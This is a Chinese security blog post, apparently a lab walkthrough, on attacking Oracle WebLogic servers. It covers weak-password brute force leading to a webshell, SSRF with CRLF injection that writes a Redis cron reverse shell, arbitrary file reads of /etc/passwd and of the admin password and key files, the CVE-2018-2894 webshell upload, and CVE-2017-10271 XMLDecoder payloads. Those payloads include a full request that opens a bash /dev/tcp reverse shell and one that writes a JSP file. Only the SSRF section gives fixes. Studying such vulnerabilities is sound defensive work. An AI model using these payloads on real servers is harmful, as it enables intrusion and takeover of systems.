<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 4.2.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon.jpg">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon16.jpg">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/font-awesome.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"mktubu.github.io","root":"/","scheme":"Gemini","version":"7.7.1","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>

  <meta name="description" content="0x0简介：WebLogic是美国Oracle公司出品的一个application server，确切的说是一个基于JAVAEE架构的中间件，WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。">
<meta property="og:type" content="article">
<meta property="og:title" content="Weblogic 安全测试">
<meta property="og:url" content="https://mktubu.github.io/2019/05/24/Weblogic/index.html">
<meta property="og:site_name" content="重明">
<meta property="og:description" content="0x0简介：WebLogic是美国Oracle公司出品的一个application server，确切的说是一个基于JAVAEE架构的中间件，WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://mktubu.github.io/images/Weblogic/1.jpg">
<meta property="og:image" content="https://mktubu.github.io/images/Weblogic/2.png">
<meta property="og:image" content="https://mktubu.github.io/images/Weblogic/3.png">
<meta property="og:image" content="https://mktubu.github.io/images/Weblogic/4.png">
<meta property="og:image" content="https://mktubu.github.io/images/Weblogic/2.png">
<meta property="og:image" content="https://mktubu.github.io/images/Weblogic/5.png">
<meta property="og:image" content="https://mktubu.github.io/images/Weblogic/4.png">
<meta property="og:image" content="https://mktubu.github.io/images/Weblogic/2.png">
<meta property="og:image" content="https://mktubu.github.io/images/Weblogic/9.png">
<meta property="og:image" content="https://mktubu.github.io/images/Weblogic/6.png">
<meta property="og:image" content="https://mktubu.github.io/images/Weblogic/7.png">
<meta property="og:image" content="https://mktubu.github.io/images/Weblogic/8.png">
<meta property="og:image" content="https://mktubu.github.io/images/Weblogic/10.png">
<meta property="og:image" content="https://mktubu.github.io/images/Weblogic/11.png">
<meta property="og:image" content="https://mktubu.github.io/images/Weblogic/12.png">
<meta property="og:image" content="https://mktubu.github.io/images/Weblogic/13.png">
<meta property="og:image" content="https://mktubu.github.io/images/Weblogic/14.png">
<meta property="article:published_time" content="2019-05-23T16:00:00.000Z">
<meta property="article:modified_time" content="2020-02-24T03:04:11.682Z">
<meta property="article:author" content="ChongMing">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://mktubu.github.io/images/Weblogic/1.jpg">

<link rel="canonical" href="https://mktubu.github.io/2019/05/24/Weblogic/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome: false,
    isPost: true
  };
</script>

  <title>Weblogic 安全测试 | 重明</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

<link rel="alternate" href="/atom.xml" title="重明" type="application/atom+xml">
</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <div>
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">重明</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>


<nav class="site-nav">
  
  <ul id="menu" class="menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-fw fa-home"></i>首页</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-fw fa-tags"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-fw fa-th"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-fw fa-archive"></i>归档</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>

</nav>
  <div class="site-search">
    <div class="popup search-popup">
    <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocorrect="off" autocapitalize="off"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result"></div>

</div>
<div class="search-pop-overlay"></div>

  </div>
</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content">
            

  <div class="posts-expand">
      
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block " lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://mktubu.github.io/2019/05/24/Weblogic/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.jpg">
      <meta itemprop="name" content="ChongMing">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="重明">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          Weblogic 安全测试
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2019-05-24 00:00:00" itemprop="dateCreated datePublished" datetime="2019-05-24T00:00:00+08:00">2019-05-24</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="fa fa-calendar-check-o"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2020-02-24 11:04:11" itemprop="dateModified" datetime="2020-02-24T11:04:11+08:00">2020-02-24</time>
              </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/%E4%B8%AD%E9%97%B4%E4%BB%B6/" itemprop="url" rel="index"><span itemprop="name">中间件</span></a>
                </span>
            </span>

          <br>
            <span class="post-meta-item" title="本文字数">
              <span class="post-meta-item-icon">
                <i class="fa fa-file-word-o"></i>
              </span>
                <span class="post-meta-item-text">本文字数：</span>
              <span>4.9k</span>
            </span>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h4 id="0x0简介："><a href="#0x0简介：" class="headerlink" title="0x0简介："></a>0x0简介：</h4><p><strong>WebLogic</strong>是美国<a href="https://baike.baidu.com/item/Oracle" target="_blank" rel="noopener">Oracle</a>公司出品的一个<strong>application server</strong>，确切的说是一个基于<strong>JAVAEE</strong>架构的<a href="https://baike.baidu.com/item/%E4%B8%AD%E9%97%B4%E4%BB%B6/452240" target="_blank" rel="noopener">中间件</a>，<strong>WebLogic</strong>是用于开发、集成、部署和管理大型分布式<strong>Web</strong>应用、网络应用和<a href="https://baike.baidu.com/item/%E6%95%B0%E6%8D%AE%E5%BA%93%E5%BA%94%E7%94%A8/10563731" target="_blank" rel="noopener">数据库应用</a>的<strong>Java</strong><a href="https://baike.baidu.com/item/%E5%BA%94%E7%94%A8%E6%9C%8D%E5%8A%A1%E5%99%A8" target="_blank" rel="noopener">应用服务器</a>。将<strong>Java</strong>的动态功能和<strong>Java Enterprise</strong>标准的安全性引入大型网络应用的开发、集成、部署和管理之中。</p>
<a id="more"></a>

<h4 id="0x01：管理员登录页面弱密码"><a href="#0x01：管理员登录页面弱密码" class="headerlink" title="0x01：管理员登录页面弱密码"></a>0x01：管理员登录页面弱密码</h4><p><strong>Weblogic</strong>的端口一般为<code>7001,7002</code></p>
<p>弱口令一般为：</p>
<blockquote>
<p>weblogic </p>
<p>Oracle@123 </p>
</blockquote>
<p>可以采用intruder爆力破解，成功后即可上传<strong>war</strong>包<strong>getshell</strong></p>
<p><img src="/images/Weblogic/1.jpg" alt="1"></p>
<h4 id="0x02：Weblogic-SSRF漏洞"><a href="#0x02：Weblogic-SSRF漏洞" class="headerlink" title="0x02：Weblogic SSRF漏洞"></a>0x02：Weblogic SSRF漏洞</h4><p><strong>Weblogic</strong>中存在一个SSRF漏洞，利用该漏洞可以发送任意<strong>HTTP</strong>请求，进而攻击内网中<strong>redis、fastcgi</strong>等脆弱组件。</p>
<p><strong>SSRF</strong>漏洞存在<code>http://your-ip:7001/uddiexplorer/SearchPublicRegistries.jsp</code></p>
<p>在<strong>Burp</strong>中测试该漏洞</p>
<ul>
<li>向服务器发送<strong>GET</strong>请求：</li>
</ul>
<p><code>?rdoSearch=name&amp;txtSearchname=sdf&amp;txtSearchkey=&amp;txtSearchfor=&amp;selfor=Business+location&amp;btnSubmit=Search&amp;operator=http://127.0.0.1:7001</code></p>
<p><img src="/images/Weblogic/2.png" alt="2"></p>
<ul>
<li><p>若发送一个不存在的端口：</p>
<p><img src="/images/Weblogic/3.png" alt="3"></p>
<p>返回值为：<img src="/images/Weblogic/4.png" alt="4"></p>
</li>
<li><p>可以通过返回的信息不同，来判断端口开放的状态。</p>
</li>
</ul>
<ol>
<li><p><strong>存在的IP地址：</strong><img src="/images/Weblogic/2.png" alt="2"></p>
</li>
<li><p><strong>不存在的IP地址：</strong></p>
<p><img src="/images/Weblogic/5.png" alt="5"></p>
</li>
</ol>
<ol start="3">
<li><p><strong>存在IP但没有打开的端口：</strong><img src="/images/Weblogic/4.png" alt="4"></p>
</li>
<li><p><strong>存在IP且端口也存在：</strong></p>
<p><img src="/images/Weblogic/2.png" alt="2"></p>
</li>
</ol>
<p><img src="/images/Weblogic/9.png" alt="9"></p>
<ul>
<li><strong>注入HTTP头，利用Redis反弹shell：</strong></li>
</ul>
<p>Weblogic的SSRF有一个比较大的特点，其虽然是一个“GET”请求，但是我们可以通过传入<code>%0a%0d</code>来注入换行符，而某些服务（如redis）是通过换行符来分隔每条命令，也就说我们可以通过该SSRF攻击内网中的redis服务器。</p>
<p>首先，通过ssrf探测内网中的redis服务器（docker环境的网段一般是172.*），发现<code>172.18.0.2:6379</code>可以连通：</p>
<p>其返回值符合端口可联通的特征：</p>
<p><img src="/images/Weblogic/6.png" alt="6"></p>
<ol>
<li><p>发送<strong>Redis</strong>命令，将反弹shell的脚本写入<code>/etc/crontab/</code></p>
<blockquote>
<p><strong>set 1 “\n\n\n\n* * * * * root bash -i &gt;&amp; /dev/tcp/() 0&gt;&amp;1\n\n\n\n”</strong><br><strong>config set dir /etc/</strong><br><strong>config set dbfilename crontab</strong><br><strong>save</strong></p>
</blockquote>
<p><strong>crond</strong>是<strong>linux</strong>下用来周期性的执行某种任务或等待处理某些事件的一个守护进程,<strong>crond</strong>进程每分钟会定期检查是否有要执行的任务，如果有要执行的任务，则自动执行该任务。</p>
</li>
<li><p>进行<strong>URL</strong>编码后将 其放在<strong>SSRF</strong>的域名后，使用<strong>GET</strong>方式发送该数据后即可获得<strong>shell</strong></p>
<p><strong>换行符是“\r\n”，也就是“%0D%0A”</strong></p>
<p><img src="/images/Weblogic/7.png" alt="7"></p>
</li>
<li><p>对于crond利用：</p>
</li>
</ol>
<blockquote>
<p>/etc/crontab 这个是肯定的</p>
<p>/etc/cron.d/* 将任意文件写到该目录下，效果和crontab相同，格式也要和/etc/crontab相同。漏洞利用这个目录，可以做到不覆盖任何其他文件的情况进行弹shell。</p>
<p>/var/spool/cron/root centos系统下root用户的cron文件</p>
<p>/var/spool/cron/crontabs/root debian系统下root用户的cron文件</p>
</blockquote>
<ul>
<li><p><strong>修复建议：</strong></p>
<ul>
<li>升级Weblogic或者将SearchPublicRegistries.jsp删除或重命名</li>
<li>删除uddiexplorer文件夹或者对其进行访问限制（内网访问）</li>
<li>过滤返回信息，验证远程服务器对请求的响应</li>
<li>黑名单内网IP，避免应用被用来获取内网数据</li>
<li>统一错误信息</li>
</ul>
</li>
</ul>
<h4 id="0x03：Weblogic-任意文件读取漏洞"><a href="#0x03：Weblogic-任意文件读取漏洞" class="headerlink" title="0x03：Weblogic 任意文件读取漏洞"></a><strong>0x03：Weblogic 任意文件读取漏洞</strong></h4><p>在该环境中访问<code>http://your-ip:7001/hello/file.jsp?path=/etc/passwd</code>即可成功读取<strong>password</strong>文件</p>
<p><img src="/images/Weblogic/8.png" alt="8"></p>
<p>以下是对该漏洞的进一步利用。</p>
<ul>
<li><strong>读取后台用户密文与密钥文件：</strong></li>
</ul>
<p><strong>weblogic</strong>密码使用<strong>AES</strong>（老版本<strong>3DES</strong>）加密，对称加密可解密，只需要找到用户的密文与加密时的密钥即可。这两个文件均位于<code>base_domain</code>下，名为``SerializedSystemIni.dat<code>和</code>config.xml<code>,在当前测试环境中为</code>./security/SerializedSystemIni.dat<code>和</code>./config/config.xml<code>（基于当前目录</code>/root/Oracle/Middleware/user_projects/domains/base_domain`）。</p>
<p><code>SerializedSystemIni.dat</code>是一个二进制文件，所以为了避免引入一些干扰字符，需要使用<strong>Burp</strong>来读取</p>
<p><code>config.xml</code>是<strong>base_domain</strong>的全局配置文件，所以乱七八糟的内容比较多，找到其中的<code>&lt;node-manager-password-encrypted&gt;</code>的值，即为加密后的管理员密码。</p>
<ul>
<li>然后解密密文，即可登陆后台上传<strong>Webshell</strong></li>
</ul>
<p>在部署上传<strong>War</strong>包时，可以将<strong>Webshell</strong>放到<code>web/hello.war/</code>这个压缩包中。</p>
<p><strong>war</strong>包制作方法<code>jar -cvf test.war ./test/*</code></p>
<ul>
<li>获取<strong>Webshell</strong></li>
</ul>
<h4 id="Weblogic-任意文件上传漏洞（CVE-2018-2894"><a href="#Weblogic-任意文件上传漏洞（CVE-2018-2894" class="headerlink" title="Weblogic 任意文件上传漏洞（CVE-2018-2894)"></a>Weblogic 任意文件上传漏洞（CVE-2018-2894)</h4><p>Web Service Test Page 在“生产模式”下默认不开启，所以该漏洞有一定限制。利用该漏洞，可以上传任意jsp文件，进而获取服务器权限。</p>
<ul>
<li><p>访问<code>http://192.168.2.154:7001/ws_utc/config.do</code>将<strong>Work Home Dir</strong>设置为<code>/u01/oracle/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css</code></p>
</li>
<li><p>点击<strong>安全</strong>，添加中上传<strong>webshell</strong></p>
</li>
</ul>
<p><img src="/images/Weblogic/10.png" alt="10"></p>
<ul>
<li>观察返回数据包中的时间戳：</li>
</ul>
<p><img src="/images/Weblogic/11.png" alt="11"></p>
<ul>
<li>然后访问<code>http://your-ip:7001/ws_utc/css/config/keystore/[时间戳]_[文件名]</code>，即可执行<strong>webshell</strong></li>
</ul>
<p><img src="/images/Weblogic/12.png" alt="12"></p>
<h4 id="Weblogic-XMLDecoder-反序列化漏洞-（CVE-2017-10271）"><a href="#Weblogic-XMLDecoder-反序列化漏洞-（CVE-2017-10271）" class="headerlink" title="Weblogic XMLDecoder 反序列化漏洞 （CVE-2017-10271）"></a>Weblogic XMLDecoder 反序列化漏洞 （CVE-2017-10271）</h4><p><strong>Weblogic</strong>的<strong>WLS Security</strong>组件对外提供<strong>webservice</strong>服务，其中使用了<strong>XMLDecoder</strong>来解析用户传入的XML数据，在解析的过程中出现反序列化漏洞，导致可执行任意命令。</p>
<ul>
<li>访问<code>/wls-wsat/CoordinatorPortType</code>发送一下数据包</li>
</ul>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span class="line">POST /wls-wsat/CoordinatorPortType HTTP/1.1</span><br><span class="line">Host: 192.168.1.51:7001</span><br><span class="line">Accept-Encoding: gzip, deflate</span><br><span class="line">Accept: */*</span><br><span class="line">Accept-Language: en</span><br><span class="line">User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)</span><br><span class="line">Connection: close</span><br><span class="line">Content-Type: text/xml</span><br><span class="line">Content-Length: 633</span><br><span class="line"></span><br><span class="line"><span class="tag">&lt;<span class="name">soapenv:Envelope</span> <span class="attr">xmlns:soapenv</span>=<span class="string">"http://schemas.xmlsoap.org/soap/envelope/"</span>&gt;</span> <span class="tag">&lt;<span class="name">soapenv:Header</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">work:WorkContext</span> <span class="attr">xmlns:work</span>=<span class="string">"http://bea.com/2004/06/soap/workarea/"</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">java</span> <span class="attr">version</span>=<span class="string">"1.4.0"</span> <span class="attr">class</span>=<span class="string">"java.beans.XMLDecoder"</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">void</span> <span class="attr">class</span>=<span class="string">"java.lang.ProcessBuilder"</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">array</span> <span class="attr">class</span>=<span class="string">"java.lang.String"</span> <span class="attr">length</span>=<span class="string">"3"</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">void</span> <span class="attr">index</span>=<span class="string">"0"</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">string</span>&gt;</span>/bin/bash<span class="tag">&lt;/<span class="name">string</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">void</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">void</span> <span class="attr">index</span>=<span class="string">"1"</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">string</span>&gt;</span>-c<span class="tag">&lt;/<span class="name">string</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">void</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">void</span> <span class="attr">index</span>=<span class="string">"2"</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">string</span>&gt;</span>bash -i <span class="symbol">&amp;gt;</span><span class="symbol">&amp;amp;</span> /dev/tcp/10.0.0.1/21 0<span class="symbol">&amp;gt;</span><span class="symbol">&amp;amp;</span>1<span class="tag">&lt;/<span class="name">string</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">void</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">array</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">void</span> <span class="attr">method</span>=<span class="string">"start"</span>/&gt;</span><span class="tag">&lt;/<span class="name">void</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">java</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">work:WorkContext</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">soapenv:Header</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">soapenv:Body</span>/&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">soapenv:Envelope</span>&gt;</span></span><br></pre></td></tr></table></figure>

<ul>
<li><strong>执行效果</strong></li>
</ul>
<p><img src="/images/Weblogic/13.png" alt="13"></p>
<p><strong>获取shell</strong></p>
<p><img src="/images/Weblogic/14.png" alt="14"></p>
<ul>
<li><strong>写入Webshell：</strong></li>
</ul>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line">POST /wls-wsat/CoordinatorPortType HTTP/1.1</span><br><span class="line">Host: your-ip:7001</span><br><span class="line">Accept-Encoding: gzip, deflate</span><br><span class="line">Accept: */*</span><br><span class="line">Accept-Language: en</span><br><span class="line">User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)</span><br><span class="line">Connection: close</span><br><span class="line">Content-Type: text/xml</span><br><span class="line">Content-Length: 638</span><br><span class="line"></span><br><span class="line"><span class="tag">&lt;<span class="name">soapenv:Envelope</span> <span class="attr">xmlns:soapenv</span>=<span class="string">"http://schemas.xmlsoap.org/soap/envelope/"</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">soapenv:Header</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">work:WorkContext</span> <span class="attr">xmlns:work</span>=<span class="string">"http://bea.com/2004/06/soap/workarea/"</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">java</span>&gt;</span><span class="tag">&lt;<span class="name">java</span> <span class="attr">version</span>=<span class="string">"1.4.0"</span> <span class="attr">class</span>=<span class="string">"java.beans.XMLDecoder"</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">object</span> <span class="attr">class</span>=<span class="string">"java.io.PrintWriter"</span>&gt;</span> </span><br><span class="line">    <span class="tag">&lt;<span class="name">string</span>&gt;</span>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/test.jsp<span class="tag">&lt;/<span class="name">string</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">void</span> <span class="attr">method</span>=<span class="string">"println"</span>&gt;</span><span class="tag">&lt;<span class="name">string</span>&gt;</span></span><br><span class="line">    &lt;![CDATA[</span><br><span class="line">&lt;% out.print("test"); %&gt;</span><br><span class="line">    ]]&gt;</span><br><span class="line">    <span class="tag">&lt;/<span class="name">string</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;/<span class="name">void</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">void</span> <span class="attr">method</span>=<span class="string">"close"</span>/&gt;</span></span><br><span class="line">    <span class="tag">&lt;/<span class="name">object</span>&gt;</span><span class="tag">&lt;/<span class="name">java</span>&gt;</span><span class="tag">&lt;/<span class="name">java</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;/<span class="name">work:WorkContext</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;/<span class="name">soapenv:Header</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">soapenv:Body</span>/&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">soapenv:Envelope</span>&gt;</span></span><br></pre></td></tr></table></figure>

<p>访问：<code>http://192.168.1.51:7001/bea_wls_internal/test.jsp</code></p>
<p>利用工具：<a href="https://github.com/hanc00l/weblogic_wls_wsat_rce" target="_blank" rel="noopener">https://github.com/hanc00l/weblogic_wls_wsat_rce</a></p>

    </div>

    
    
    

      <footer class="post-footer">

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2019/05/22/%E7%AB%AF%E5%8F%A3%E6%89%AB%E6%8F%8F/" rel="prev" title="基于python3的端口扫描">
      <i class="fa fa-chevron-left"></i> 基于python3的端口扫描
    </a></div>
      <div class="post-nav-item">
    <a href="/2019/06/11/DDCTF/" rel="next" title="ddctf">
      ddctf <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  

  </div>


          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let activeClass = CONFIG.comments.activeClass;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-4"><a class="nav-link" href="#0x0简介："><span class="nav-number">1.</span> <span class="nav-text">0x0简介：</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#0x01：管理员登录页面弱密码"><span class="nav-number">2.</span> <span class="nav-text">0x01：管理员登录页面弱密码</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#0x02：Weblogic-SSRF漏洞"><span class="nav-number">3.</span> <span class="nav-text">0x02：Weblogic SSRF漏洞</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#0x03：Weblogic-任意文件读取漏洞"><span class="nav-number">4.</span> <span class="nav-text">0x03：Weblogic 任意文件读取漏洞</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#Weblogic-任意文件上传漏洞（CVE-2018-2894"><span class="nav-number">5.</span> <span class="nav-text">Weblogic 任意文件上传漏洞（CVE-2018-2894)</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#Weblogic-XMLDecoder-反序列化漏洞-（CVE-2017-10271）"><span class="nav-number">6.</span> <span class="nav-text">Weblogic XMLDecoder 反序列化漏洞 （CVE-2017-10271）</span></a></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="ChongMing"
      src="/images/avatar.jpg">
  <p class="site-author-name" itemprop="name">ChongMing</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">32</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">8</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">13</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="https://github.com/mktubu" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;mktubu" rel="noopener" target="_blank"><i class="fa fa-fw fa-github"></i>GitHub</a>
      </span>
      <span class="links-of-author-item">
        <a href="mailto:528999959@qq.com" title="E-Mail → mailto:528999959@qq.com" rel="noopener" target="_blank"><i class="fa fa-fw fa-envelope"></i>E-Mail</a>
      </span>
  </div>



